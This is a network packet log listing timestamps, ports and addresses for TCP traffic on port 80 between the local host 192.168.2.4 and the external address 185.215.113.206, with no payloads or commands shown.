Nov 7, 2024 04:12:20.033276081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033287048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033299923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033308983 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033312082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033317089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033324957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033334017 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033338070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033351898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033360958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033380985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033405066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033406973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033416986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033430099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033441067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033452988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033454895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033464909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033478975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033490896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033492088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033505917 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033530951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033560038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033571959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033586979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033602953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033603907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033616066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033622980 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033627987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033641100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033643961 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033655882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033663988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033669949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033680916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033693075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033694029 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033705950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033711910 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033718109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033746004 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033756018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033773899 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033795118 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033850908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033873081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033884048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033888102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033895016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033904076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033914089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033925056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033927917 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033937931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033957958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033957958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033981085 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033983946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033996105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034007072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034013033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034017086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034029007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034033060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034041882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034068108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034080029 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034126043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034137011 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034147978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034157991 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034168959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034178019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034182072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034188032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034193039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034200907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034200907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034209967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034214973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034224987 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034224987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034233093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034239054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034269094 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034286976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034291029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034302950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034312963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034322023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034326077 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034332991 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034353018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034358978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034374952 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034384966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034396887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034403086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034409046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034421921 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034432888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034435034 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034457922 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034457922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034471989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034483910 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034507990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034511089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034519911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034532070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034543991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034547091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034560919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034574986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034604073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034626007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034638882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034648895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034661055 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034672022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034692049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034703970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034708023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034724951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034759998 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034761906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034774065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034785032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034796953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034799099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034807920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034811974 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034828901 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034858942 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034917116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034926891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034936905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034951925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034955978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034974098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034975052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.034987926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.034998894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.035011053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.035010099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.035022974 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.035034895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.035068035 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.102821112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.102844000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.102857113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.102869034 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.102897882 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103034973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103046894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103058100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103069067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103085995 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103085995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103096008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103101015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103112936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103136063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103157997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103193045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103210926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103221893 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103228092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103240013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103244066 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103266001 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103266954 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103290081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103300095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103358984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103389025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103400946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103400946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103413105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103420973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103425026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103437901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103440046 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103450060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103451967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103461981 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103473902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103483915 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103490114 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103502035 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103512049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103523016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103533983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103533030 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103547096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103558064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103562117 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103569031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103581905 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103586912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103600025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103602886 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103611946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103615999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103648901 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103709936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103722095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103733063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103744030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103754044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103758097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103771925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103775978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103786945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103795052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103801012 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103811979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103821993 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103825092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103837013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103859901 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103868961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103878975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103884935 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103890896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103909016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103910923 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103920937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103931904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103936911 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103944063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103955984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.103961945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.103985071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104002953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104044914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104055882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104065895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104078054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104079962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104091883 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104096889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104118109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104127884 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104129076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104154110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104161024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104172945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104183912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104183912 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104193926 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104195118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104208946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104211092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104221106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104232073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104259968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104299068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104310989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104321957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104332924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104341984 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104351997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104372978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104372978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104378939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104398966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104403019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104414940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104423046 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104425907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104432106 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104439020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104456902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104470015 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104485989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104499102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104510069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104521036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104521990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104533911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104547977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104552031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104561090 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104573011 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104583025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104592085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104600906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104614019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104623079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104628086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104638100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104659081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104665995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104677916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104682922 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104695082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104711056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104732037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104732990 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104742050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104753971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104763985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104787111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104794979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104799032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104815006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104816914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104825020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104830027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104855061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104860067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104871035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104883909 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104907990 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.104943037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104974985 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.104986906 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.105001926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.105012894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.105016947 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.105036020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.105053902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.143059015 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.147867918 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424550056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424566031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424586058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424597025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424607038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424612045 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.424618006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424633980 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.424638987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.424664021 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.424679041 CET	80	49755	185.215.113.206	192.168.2.4
